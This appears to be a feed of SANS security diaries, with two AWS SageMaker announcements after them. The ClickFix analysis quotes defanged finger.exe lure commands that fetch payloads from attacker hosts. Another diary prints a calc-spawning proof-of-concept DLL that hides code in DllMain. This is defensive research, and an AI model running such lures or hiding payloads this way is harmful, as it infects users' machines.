ClickFix Attacks Still Using the Finger, (Sat, Dec 13th)

Introduction

Since at least November 2025, the finger protocol has been used in ClickFix social engineering attacks. BleepingComputer published a report of this activity on November 15th, and Didier Stevens posted a short follow-up in an ISC diary the next day.

I often investigate two campaigns that employ ClickFix attacks: KongTuke and SmartApeSG. When I checked on Thursday, December 11th, both campaigns were using commands that ran finger.exe in Windows to retrieve malicious content.

So after nearly a month, ClickFix attacks are still giving us the finger.


Shown above: ClickFix attacks running finger.exe.

KongTuke Example

My investigation of KongTuke activity on December 11th revealed a command for finger gcaptcha@captchaver[.]top from the fake CAPTCHA page.


Shown above: Example of fake CAPTCHA page from the KongTuke campaign on December 11th, 2025.

I recorded network traffic generated by running this ClickFix script, and I used the finger filter in Wireshark to find finger traffic over TCP port 79.


Shown above: Finding finger traffic using the finger filter in Wireshark.
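
If you prefer to script the same triage, the finger responses can also be pulled straight out of the recorded pcap. Here is a minimal sketch, assuming Scapy is installed and the capture was saved under a hypothetical filename of traffic.pcap:

# extract_finger.py - dump data returned over TCP port 79 (finger) from a capture file
# Assumes: pip install scapy; "traffic.pcap" is a hypothetical filename
from scapy.all import rdpcap, TCP, Raw

for pkt in rdpcap("traffic.pcap"):
    # Responses from a finger server come from source port 79
    if pkt.haslayer(TCP) and pkt[TCP].sport == 79 and pkt.haslayer(Raw):
        print(pkt[Raw].load.decode("utf-8", errors="replace"))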

Following the TCP stream of this traffic revealed text returned from the server. The result was a PowerShell command with Base64-encoded text.


Shown above: Text returned from the server in response to the finger command.
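
The Base64 text can be decoded offline to inspect the payload without running it. A minimal sketch follows; the string below is a placeholder, not the actual payload, and the UTF-16LE attempt covers PowerShell's -EncodedCommand form:

# decode_b64.py - decode Base64 text recovered from the finger response
import base64

b64_text = "SQBFAFgAIAAuAC4ALgA="  # placeholder string, not the real payload
raw = base64.b64decode(b64_text)

# PowerShell -EncodedCommand arguments are UTF-16LE; other blobs are often UTF-8
try:
    print(raw.decode("utf-16-le"))
except UnicodeDecodeError:
    print(raw.decode("utf-8", errors="replace"))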

SmartApeSG Example

My investigation of SmartApeSG activity on December 11th revealed a command for finger Galo@91.193.19[.]108 from the fake CAPTCHA page.


Shown above: Example of fake CAPTCHA page from the SmartApeSG campaign on December 11th, 2025.

I recorded network traffic generated by running this ClickFix script, and I used the finger filter in Wireshark to find finger traffic over TCP port 79.


Shown above: Finding finger traffic using the finger filter in Wireshark.

Following the TCP stream of this traffic revealed text returned from the server. The result was a script to retrieve content from pmidpils[.]com/yhb.jpg, then save and run that content on the user's Windows host.


Shown above: Text returned from the server in response to the finger command.

Final Words

As Didier Stevens noted in last month's diary about this activity, corporate environments with an explicit proxy will block TCP port 79 traffic generated by finger.exe. However, if TCP port 79 traffic isn't blocked, these attacks could still be effective.

Bradley Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Abusing DLLs EntryPoint for the Fun, (Fri, Dec 12th)

In the Microsoft Windows ecosystem, DLLs (Dynamic-Link Libraries) are PE files like regular programs. One of the main differences is that they export functions that can be called by the programs that load them. For example, to call RegOpenKeyExA(), a program must first load ADVAPI32.dll. A PE file has a lot of headers (metadata) that contain useful information used by the loader to prepare the execution in memory. One of them is the EntryPoint: it contains the (relative virtual) address where the program will start to execute.


In the case of a DLL, there is also an entry point, logically called the DllEntryPoint. The code located at this address is executed when the library is loaded (or unloaded). The function executed is called DllMain()[1] and expects three parameters:

BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL, 
  _In_ DWORD fdwReason, 
  _In_ LPVOID lpvReserved
);

The second parameter (fdwReason) indicates why the DLL entry-point function is being called:

  • DLL_PROCESS_DETACH (0)
  • DLL_PROCESS_ATTACH (1)
  • DLL_THREAD_ATTACH (2)
  • DLL_THREAD_DETACH (3)

Note that this function is optional, but it is usually implemented to prepare the environment used by the DLL (loading resources, initializing variables, etc.). Microsoft also recommends avoiding sensitive actions at that location.

A lot of malware is deployed as DLLs because they are more challenging to detect. The tool regsvr32.exe[2] is a classic attack vector because it helps register a DLL in the system (such a DLL will implement a DllRegisterServer() function). Another tool is rundll32.exe[3], which allows calling a function exported by a DLL:

C:> rundll32.exe mydll.dll,myExportedFunction

When a suspicious DLL is being investigated, the first reflex of many reverse engineers is to look at the exported function(s) in the export table, without paying attention to the entry point.

This DllMain() is a very nice place where threat actors can store malicious code that will probably remain below the radar if you don't know that this entry point exists. I wrote a proof-of-concept DLL that executes some code once loaded (it will just pop up calc.exe). Here is the simple code:

// evildll.cpp
#include <windows.h>
#pragma comment(lib, "user32.lib")

extern "C" __declspec(dllexport) void SafeFunction() {
    // Simple exported function
    MessageBoxA(NULL, "SafeFunction() was called!", "evildll", MB_OK | MB_ICONINFORMATION);
}

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
        {
            // Optional: disable thread notifications to reduce overhead
            DisableThreadLibraryCalls(hModule);

            STARTUPINFOA si{};
            PROCESS_INFORMATION pi{};
            si.cb = sizeof(si);
            char cmdLine[] = "calc.exe";

            BOOL ok = CreateProcessA(NULL, cmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
            if (ok) {
                CloseHandle(pi.hThread);
                CloseHandle(pi.hProcess);
            } else {
                // optional: GetLastError() handling/logging
            }
            break;
        }
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

And now, a simple program used to load my DLL:

// loader.cpp
#include <windows.h>
#include <stdio.h>

typedef void (*SAFEFUNC)();

int main()
{
    // Load the DLL
    HMODULE hDll = LoadLibraryA("evildll.dll");
    if (!hDll)
    {
        printf("LoadLibrary failed (error %lu)n", GetLastError());
        return 1;
    }
    printf("[+] DLL loaded successfullyn");

    // Resolve the function
    SAFEFUNC SafeFunction = (SAFEFUNC)GetProcAddress(hDll, "SafeFunction");
    if (!SafeFunction)
    {
        printf("GetProcAddress failed (error %lu)n", GetLastError());
        FreeLibrary(hDll);
        return 1;
    }
    printf("[+] SafeFunction() resolvedn");

    // Call the function
    SafeFunction();

    // Unload DLL
    FreeLibrary(hDll);

    return 0;
}

Let's compile the DLL and the loader, then execute it:

When the DLL is loaded with LoadLibraryA(), the calc.exe process is spawned automatically, even if no DLL function is invoked!
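
Before (or instead of) loading an unknown DLL, it is worth checking where its entry point lives and what it exports. A minimal sketch, assuming the pefile Python module is installed and using the PoC DLL built above:

# inspect_dll.py - quick static look at a DLL's entry point and export table
# Assumes: pip install pefile
import pefile

pe = pefile.PE("evildll.dll")
print("AddressOfEntryPoint (RVA):", hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint))

# The export table is what most analysts look at first
if hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
    for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
        name = exp.name.decode() if exp.name else "<ordinal only>"
        print("Export:", name, "@ RVA", hex(exp.address))

A non-trivial entry point in a DLL that only claims to expose a few harmless exports is a good hint that the code behind DllMain() deserves a look in a disassembler.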

Conclusion: Always have a quick look at the DLL entry point!

[1] https://learn.microsoft.com/en-us/windows/win32/dlls/dllmain
[2] https://attack.mitre.org/techniques/T1218/010/
[3] https://attack.mitre.org/techniques/T1218/011/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Using AI Gemma 3 Locally with a Single CPU , (Wed, Dec 10th)

Several months ago, I got a Nucbox K8 Plus minicomputer to use as a Proxmox 9 server. At the time of this acquisition, I didn't realize this minicomputer had an artificial intelligence (AI) engine [1] built into the CPU that could be used to run AI applications locally. A coworker recommended that I try Google Gemma 3 as a local open AI model to work with my use cases.

"Gemma is a family of generative artificial intelligence (AI) models and you can use them in a wide variety of generation tasks, including question answering, summarization, and reasoning." [2], a review of the Gemma 3 key features is also posted on this page. This page [3] lists the minimum requirements for the 5 Gemma 3 models 270M, 1B, 4B, 12B, and 27B.

Default Open WebUI

My Setup with Open WebUI

  • OS is a Linux Container (LXC) Ubuntu 24.04
  • Ollama with gemma3:12b [4]
  • Open WebUI [5]

Installing Ollama with Gemma 3

I used these steps to get Gemma set up. First, review the RAM requirements [3] before deciding which Gemma 3 model to install. You can start small (e.g., 4B or smaller) for testing before using a larger model. I'm using 4B and 12B with 16 GB of RAM in my installation.

If you want to test some queries before installing the WebUI, the following command will open the interpreter:

ollama run gemma3:4b
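
Ollama also listens on a local HTTP API (port 11434 by default), which is handy for scripting quick tests instead of using the interactive interpreter. A minimal sketch, assuming the requests module is installed and gemma3:4b has been pulled:

# query_ollama.py - send a single prompt to the local Ollama API
# Assumes: pip install requests; Ollama running locally with gemma3:4b pulled
import requests

resp = requests.post(
    "http://localhost:11434/api/generate",
    json={"model": "gemma3:4b", "prompt": "Describe the IPv4 header.", "stream": False},
    timeout=300,
)
resp.raise_for_status()
print(resp.json()["response"])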

Since I have a Ryzen 7 CPU, my next step was to install the amdgpu [7] software to use the AI features of the CPU. The last step is to install the graphical interface to work from a browser using Open WebUI [5]; there are several methods listed there to get the WebUI running. I had to try a few combinations; in the end, this is what I used:

sudo docker run -d -p 80:8080 -v ollama:/root/.ollama --add-host=host.docker.internal:host-gateway -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:main

Bugs in Proxmox 9 for LXC and AppArmor

For the Linux Container to run correctly, I had to edit the LXC config file (114 is the container number) and add these two lines:

vi /etc/pve/lxc/114.conf

  • lxc.apparmor.profile: unconfined
  • lxc.mount.entry: /dev/null sys/module/apparmor/parameters/enabled none bind 0 0

It may also be necessary to add this option to the docker run command above: --security-opt apparmor:unconfined

Login WebUI Interface

After the installation of the WebUI, you need to create the first admin account before being able to log in. My first query asked my AI to describe the IPv4 header:

Gemma 3 offers the ability to work with large files thanks to its 128K context window, can work with images, and has multilingual support, which is practical if you know multiple languages. Finally, it can run locally on a PC, laptop, or smartphone using a single GPU or TPU, as well as on smaller devices. If you have experience using Gemma 3, what use cases are you using it for? You can add your comments in our contact form.

[1] https://www.amd.com/en/products/processors/laptop/ryzen/8000-series/amd-ryzen-7-8845hs.html
[2] https://ai.google.dev/gemma/docs/core
[3] https://ai.google.dev/gemma/docs/core#sizes
[4] https://deepmind.google/models/gemma/gemma-3/
[5] https://github.com/open-webui/open-webui
[6] https://ai.google.dev/gemma/docs/integrations/ollama?utm_source=deepmind.google&utm_medium=referral&utm_campaign=gdm&utm_content
[7] https://rocm.docs.amd.com/projects/radeon-ryzen/en/latest/docs/install/installryz/native_linux/install-ryzen.html
[8] https://forum.proxmox.com/threads/priviledge-container-disabling-apparmor-does-not-work.122168/
[9] https://blog.ktz.me/apparmors-awkward-aftermath-atop-proxmox-9/
[10] https://docs.openwebui.com/

———–
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AutoIT3 Compiled Scripts Dropping Shellcodes, (Fri, Dec 5th)

AutoIT3[1] is a powerful language that helps build nice applications for Windows environments, mainly to automate tasks. Although it looks pretty old, the latest version was released last September, and it remains popular amongst developers, for the good… or the bad! Malware written in AutoIt3 has existed since the late 2000s, when attackers realized that the language was easy to learn (close to BASIC) but could also be compiled into standalone PE files! From a malware point of view, such executables make extensive use of packed data, making them stealthier.

Nation-State Attack or Compromised Government? [Guest Diary], (Thu, Dec 4th)

[This is a Guest Diary by Jackie Nguyen, an ISC intern as part of the SANS.edu BACS program]

The ISC internship didn't just teach me about security; it changed how I thought about threats entirely. There's something intriguing about watching live attacks materialize on your DShield Honeypot, knowing that somewhere across the world, an attacker just made a move. And the feedback loop of writing detailed attack observations, then having experienced analysts critique and refine your analysis? That's where real learning happens. One attack observation in particular stands out as a perfect example of what makes this internship so powerful. Let me show you what I discovered!

The Beginning…

On November 10, 2025, my honeypot captured very interesting activity that really demonstrates how sophisticated modern threat actors are getting. What initially appeared to be a simple but successful SSH brute-force attempt quickly revealed itself as something far more concerning: the deployment of an advanced trojan designed for long-term persistence and evasion.

What happened?

Suspicious activity was detected when the IP address 103[.]148[.]195[.]161 successfully SSH’d into my honeypot using the username “root” and password “linux”. The bad actor maintained access to the honeypot for 1 minute and 45 seconds but ultimately ran no commands. Instead, the attacker uploaded a single file: a trojan binary named “sshd”, designed to evade security detections by pretending to be the OpenSSH daemon. It was an Executable and Linkable Format (ELF) binary (7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d) that was classified as malicious by VirusTotal and Hybrid-Analysis.

We won’t be able to see what the trojan did on my honeypot at this time; however, I found the hash on Hybrid-Analysis and got a good idea of what the trojan does.

A screenshot of the cowrie output using Jesse La Grew’s cowrieprocessor [4]

Trojan File Analysis

MITRE ATT&CK MAPPING

•    T1078 – Valid Accounts
•    T1110.001 – Brute Force
•    T1204.002 – User Execution
•    T1036.005 – Masquerading
•    T1554 – Compromise Client Software Binary
•    T1548.001 – Abuse Elevation Control Mechanism
•    T1027 – Obfuscated Files or Information
•    T1497 – Virtualization/Sandbox Evasion
•    T1480 – Execution Guardrails
•    T1003.008 – OS Credential Dumping

Prevent Similar Attacks

1.    Disable Password Authentication and utilize SSH keys instead
2.    IP Allowlisting
3.    IDS/IPS/EDR
4.    Threat Hunting
5.    MFA

What does this show?

This really shows how much effort sophisticated attackers will put into long-term persistence and advanced evasion. An attack from a government IP address doesn’t always mean it’s the government; more likely, it means that the address was compromised. If you think about it logically, why would a nation-state threat actor use their actual government IP address to execute attacks?

Importance?

It’s important when working on a high-performing security team not to attribute attacks to the wrong threat actor. Politically, this can cause problems, especially if the company you’re working for has a large media presence. Problems such as wrongful retaliation and political tension could arise from making this mistake.

This attack also shows how threat actors use legitimate processes to blend in with normal ones. We must remember that the goal of this attacker is most likely long-term so they will do everything they can to evade your defenses.

Actionable Intelligence for Defenders

Threat hunting is a critical part of any security program and having concrete Indicators of Compromise (IOCs) like file hashes, malicious IP addresses, and more would give teams actionable intelligence to use immediately. This observation also helps defenders understand what to look for. Brief sessions without commands can be just as dangerous as those with suspicious activity.
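
As a small illustration of turning such an IOC into something immediately actionable, the sketch below checks the SHA-256 hash from this incident against VirusTotal. It assumes the requests module is installed and an API key is exported as VT_API_KEY:

# check_ioc.py - look up a file hash with the VirusTotal API (v3)
# Assumes: pip install requests; a VirusTotal API key in the VT_API_KEY environment variable
import os
import requests

SHA256 = "7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d"

resp = requests.get(
    f"https://www.virustotal.com/api/v3/files/{SHA256}",
    headers={"x-apikey": os.environ["VT_API_KEY"]},
    timeout=30,
)
resp.raise_for_status()
stats = resp.json()["data"]["attributes"]["last_analysis_stats"]
print("malicious:", stats["malicious"], "suspicious:", stats["suspicious"])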

Key Takeaways

This attack really shows how threat actors are getting more sophisticated. By uploading a legitimate looking trojan instead of running commands, the attacker could have avoided the typical red flags most monitoring tools look for. The use of a government IP address also teaches us an important lesson not to immediately jump to conclusions solely based on IP block owner since it might have been compromised. For analysts out there, what seems to be a quiet session can sometimes be the most dangerous.

[1] https://www.virustotal.com/gui/file/7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d/detection
[2] https://www.abuseipdb.com/whois/103.148.195.161
[3] https://hybridanalysis.com/sample/7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d/6542c8b6abeb51c5ee0bbf2a
[4] https://github.com/jslagrew/cowrieprocessor
[5] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Attempts to Bypass CDNs, (Wed, Dec 3rd)

Currently, in order to provide basic DDoS protection and filter aggressive bots, some form of Content Delivery Network (CDN) is usually the simplest and most cost-effective way to protect a web application. In a typical setup, DNS is used to point clients to the CDN, and the CDN will then forward the request to the actual web server. There are a number of companies offering services like this, and cloud providers will usually have solutions like this as well.
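
A common bypass attempt against this setup is simply probing whether the origin web server answers requests that never traverse the CDN. The sketch below shows the idea from a defender's self-test perspective; the origin IP and hostname are hypothetical placeholders:

# origin_check.py - test whether an origin server answers requests that bypass the CDN
# Assumes: pip install requests; the IP and hostname below are hypothetical placeholders
import requests

ORIGIN_IP = "203.0.113.10"     # hypothetical origin address (documentation range)
HOSTNAME = "www.example.com"   # hypothetical site normally served through the CDN

try:
    resp = requests.get(
        f"https://{ORIGIN_IP}/",
        headers={"Host": HOSTNAME},
        verify=False,  # the certificate will not match a bare IP address
        timeout=10,
    )
    print("Origin answered directly: HTTP", resp.status_code)
except requests.RequestException as exc:
    print("No direct answer from the origin:", exc)

If the origin does answer such requests, restricting it to accept connections only from the CDN's published address ranges closes that gap.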

New serverless customization in Amazon SageMaker AI accelerates model fine-tuning

Today, I’m happy to announce new serverless customization in Amazon SageMaker AI for popular AI models, such as Amazon Nova, DeepSeek, GPT-OSS, Llama, and Qwen. The new customization capability provides an easy-to-use interface for the latest fine-tuning techniques like reinforcement learning, so you can accelerate the AI model customization process from months to days.

With a few clicks, you can seamlessly select a model and customization technique, and handle model evaluation and deployment—all entirely serverless so you can focus on model tuning rather than managing infrastructure. When you choose serverless customization, SageMaker AI automatically selects and provisions the appropriate compute resources based on the model and data size.

Getting started with serverless model customization
You can get started customizing models in Amazon SageMaker Studio. Choose Models in the left navigation pane and check out your favorite AI models to be customized.

Customize with UI
You can customize AI models in only a few clicks. In the Customize model dropdown list for a specific model such as Meta Llama 3.1 8B Instruct, choose Customize with UI.

You can select a customization technique used to adapt the base model to your use case. SageMaker AI supports Supervised Fine-Tuning and the latest model customization techniques including Direct Preference Optimization, Reinforcement Learning from Verifiable Rewards (RLVR), and Reinforcement Learning from AI Feedback (RLAIF). Each technique optimizes models in different ways, with selection influenced by factors such as dataset size and quality, available computational resources, task at hand, desired accuracy levels, and deployment constraints.

Upload or select a training dataset that matches the format required by the selected customization technique. Use the batch size, learning rate, and number of epochs recommended for that technique. You can configure advanced settings such as hyperparameters, the newly introduced serverless MLflow application for experiment tracking, and network and storage volume encryption. Choose Submit to start your model training job.
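
To make the dataset step concrete, supervised fine-tuning data is commonly stored as one JSON record per line (JSONL) with a prompt and the desired completion. The field names below are a common convention, not necessarily the exact schema SageMaker AI requires for every technique, so follow the format guidance shown in the console:

# make_sft_dataset.py - write a few illustrative JSONL records for supervised fine-tuning
# The prompt/completion field names are a common convention, not necessarily the exact
# schema required here; check the console's format guidance for the selected technique.
import json

examples = [
    {"prompt": "Summarize: The quick brown fox jumps over the lazy dog.",
     "completion": "A fox jumps over a dog."},
    {"prompt": "What is the capital of France?",
     "completion": "Paris."},
]

with open("train.jsonl", "w", encoding="utf-8") as f:
    for record in examples:
        f.write(json.dumps(record) + "\n")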

After your training job is complete, you can see the models you created in the My Models tab. Choose View details in one of your models.

By choosing Continue customization, you can continue to customize your model by adjusting hyperparameters or training with different techniques. By choosing Evaluate, you can evaluate your customized model to see how it performs compared to the base model.

When you complete both jobs, you can choose either SageMaker or Bedrock in the Deploy dropdown list to deploy your model.

You can choose Amazon Bedrock for serverless inference. Choose Bedrock and the model name to deploy the model into Amazon Bedrock. To find your deployed models, choose Imported models in the Bedrock console.

You can also deploy your model to a SageMaker AI inference endpoint if you want to control your deployment resources such as an instance type and instance count. After the SageMaker AI deployment is In service, you can use this endpoint to perform inference. In the Playground tab, you can test your customized model with a single prompt or chat mode.
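
Outside the Playground tab, the same endpoint can be invoked programmatically. A minimal sketch using boto3's SageMaker runtime client, assuming AWS credentials are configured, a hypothetical endpoint name, and a serving container that accepts a JSON "inputs" payload:

# invoke_endpoint.py - call a deployed SageMaker AI inference endpoint
# Assumes: pip install boto3; AWS credentials configured; the endpoint name is hypothetical
import json
import boto3

runtime = boto3.client("sagemaker-runtime")

response = runtime.invoke_endpoint(
    EndpointName="my-customized-model-endpoint",  # hypothetical name
    ContentType="application/json",
    Body=json.dumps({"inputs": "Describe the IPv4 header."}),  # payload shape depends on the container
)
print(response["Body"].read().decode("utf-8"))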

With the serverless MLflow capability, you can automatically log all critical experiment metrics without modifying code and access rich visualizations for further analysis.

Customize with code
When you choose Customize with code, you can see a sample notebook to fine-tune or deploy AI models. If you want to edit the sample notebook, open it in JupyterLab. Alternatively, you can deploy the model immediately by choosing Deploy.

You can choose the Amazon Bedrock or SageMaker AI endpoint by selecting the deployment resources either from Amazon SageMaker Inference or Amazon SageMaker Hyperpod.

When you choose Deploy at the bottom right of the page, you will be redirected back to the model detail page. After the SageMaker AI deployment is in service, you can use this endpoint to perform inference.

Okay, you’ve seen how to streamline model customization in SageMaker AI. You can now choose your favorite way. To learn more, visit the Amazon SageMaker AI Developer Guide.

Now available
New serverless AI model customization in Amazon SageMaker AI is now available in US East (N. Virginia), US West (Oregon), Asia Pacific (Tokyo), and Europe (Ireland) Regions. You only pay for the tokens processed during training and inference. To learn more, visit the Amazon SageMaker AI pricing page.

Give it a try in Amazon SageMaker Studio and send feedback to AWS re:Post for SageMaker or through your usual AWS Support contacts.

Channy

Introducing checkpointless and elastic training on Amazon SageMaker HyperPod

Today, we’re announcing two new AI model training features within Amazon SageMaker HyperPod: checkpointless training, an approach that mitigates the need for traditional checkpoint-based recovery by enabling peer-to-peer state recovery, and elastic training, enabling AI workloads to automatically scale based on resource availability.

  • Checkpointless training – Checkpointless training eliminates disruptive checkpoint-restart cycles, maintaining forward training momentum despite failures, reducing recovery time from hours to minutes. Accelerate your AI model development, reclaim days from development timelines, and confidently scale training workflows to thousands of AI accelerators.
  • Elastic training  – Elastic training maximizes cluster utilization as training workloads automatically expand to use idle capacity as it becomes available, and contract to yield resources as higher-priority workloads like inference volumes peak. Save hours of engineering time per week spent reconfiguring training jobs based on compute availability.

Rather than spending time managing training infrastructure, these new training techniques mean that your team can concentrate entirely on enhancing model performance, ultimately getting your AI models to market faster. By eliminating the traditional checkpoint dependencies and fully utilizing available capacity, you can significantly reduce model training completion times.

Checkpointless training: How it works
Traditional checkpoint-based recovery has these sequential job stages: 1) job termination and restart, 2) process discovery and network setup, 3) checkpoint retrieval, 4) data loader initialization, and 5) training loop resumption. When failures occur, each stage can become a bottleneck and training recovery can take up to an hour on self-managed training clusters. The entire cluster must wait for every single stage to complete before training can resume. This can lead to the entire training cluster sitting idle during recovery operations, which increases costs and extends the time to market.

Checkpointless training removes this bottleneck entirely by maintaining continuous model state preservation across the training cluster. When failures occur, the system instantly recovers by using healthy peers, avoiding the need for a checkpoint-based recovery that requires restarting the entire job. As a result, checkpointless training enables fault recovery in minutes.

Checkpointless training is designed for incremental adoption and built on four core components that work together: 1) collective communications initialization optimizations, 2) memory-mapped data loading that enables caching, 3) in-process recovery, and 4) checkpointless peer-to-peer state replication. These components are orchestrated through the HyperPod training operator that is used to launch the job. Each component optimizes a specific step in the recovery process, and together they enable automatic detection and recovery of infrastructure faults in minutes with zero manual intervention, even with thousands of AI accelerators. You can progressively enable each of these features as your training scales.

The latest Amazon Nova models were trained using this technology on tens of thousands of accelerators. Additionally, based on internal studies on cluster sizes ranging between 16 GPUs to over 2,000 GPUs, checkpointless training showcased significant improvements in recovery times, reducing downtime by over 80% compared to traditional checkpoint-based recovery.

To learn more, visit HyperPod Checkpointless Training in the Amazon SageMaker AI Developer Guide.

Elastic training: How it works
On clusters that run different types of modern AI workloads, accelerator availability can change continuously throughout the day as short-duration training runs complete, inference spikes occur and subside, or resources free up from completed experiments. Despite this dynamic availability of AI accelerators, traditional training workloads remain locked into their initial compute allocation, unable to take advantage of idle accelerators without manual intervention. This rigidity leaves valuable GPU capacity unused and prevents organizations from maximizing their infrastructure investment.

Elastic training transforms how training workloads interact with cluster resources. Training jobs can automatically scale up to utilize available accelerators and gracefully contract when resources are needed elsewhere, all while maintaining training quality.

Workload elasticity is enabled through the HyperPod training operator that orchestrates scaling decisions through integration with the Kubernetes control plane and resource scheduler. It continuously monitors cluster state through three primary channels: pod lifecycle events, node availability changes, and resource scheduler priority signals. This comprehensive monitoring enables near-instantaneous detection of scaling opportunities, whether from newly available resources or requests from higher-priority workloads.

The scaling mechanism relies on adding and removing data parallel replicas. When additional compute resources become available, new data parallel replicas join the training job, accelerating throughput. Conversely, during scale-down events (for example, when a higher-priority workload requests resources), the system scales down by removing replicas rather than terminating the entire job, allowing training to continue at reduced capacity.

Across different scales, the system preserves the global batch size and adapts learning rates, preventing model convergence from being adversely impacted. This enables workloads to dynamically scale up or down to utilize available AI accelerators without any manual intervention.
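
To make the batch-size bookkeeping concrete, here is a toy sketch with illustrative numbers: with a fixed global batch size, the per-replica batch simply shrinks or grows as data-parallel replicas join or leave. How the learning rate is adapted is not detailed here, so it is left out of the sketch:

# elastic_batch.py - illustrate keeping the global batch size fixed as replicas change
# Numbers are illustrative only.
GLOBAL_BATCH_SIZE = 1024

def per_replica_batch(num_replicas: int) -> int:
    """Samples each data-parallel replica processes per step for a fixed global batch."""
    assert GLOBAL_BATCH_SIZE % num_replicas == 0, "replica count must divide the global batch"
    return GLOBAL_BATCH_SIZE // num_replicas

for replicas in (8, 16, 32):  # e.g., a job scaling up as idle accelerators become available
    print(replicas, "replicas ->", per_replica_batch(replicas), "samples per replica per step")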

You can start elastic training through the HyperPod recipes for publicly available foundation models (FMs) including Llama and GPT-OSS. Additionally, you can modify your PyTorch training scripts to add elastic event handlers, which enable the job to dynamically scale.

To learn more, visit the HyperPod Elastic Training in the Amazon SageMaker AI Developer Guide. To get started, find the HyperPod recipes available in the AWS GitHub repository.

Now available
Both features are available in all the Regions in which Amazon SageMaker HyperPod is available. You can use these training techniques without additional cost. To learn more, visit the SageMaker HyperPod product page and SageMaker AI pricing page.

Give it a try and send feedback to AWS re:Post for SageMaker or through your usual AWS Support contacts.

Channy